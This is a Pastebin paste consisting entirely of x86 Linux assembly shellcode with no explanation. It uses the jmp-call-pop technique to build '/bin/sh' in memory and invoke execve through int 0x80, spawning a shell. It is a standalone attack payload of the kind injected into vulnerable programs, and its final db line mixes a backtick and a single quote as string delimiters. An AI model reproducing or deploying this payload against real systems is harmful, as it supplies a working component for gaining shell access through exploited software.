Advertisement
Guest User

Untitled

a guest
Aug 17th, 2017
46
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.51 KB | None | 0 0
  1. Section .text
  2. global _start
  3. _start:
  4. jmp short GotoCall
  5. shellcode:
  6. pop esi
  7. xor eax, eax
  8. mov byte [esi + 7], al
  9. lea ebx, [esi]
  10. mov long [esi + 8], ebx
  11. mov long [esi + 12], eax
  12. mov byte al, 0x0b
  13. mov ebx, esi
  14. lea ecx, [esi + 8]
  15. lea edx, [esi + 12]
  16. int 0x80
  17. GotoCall:
  18. Call shellcode
  19. db `/bin/shJAAAAKKKK'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement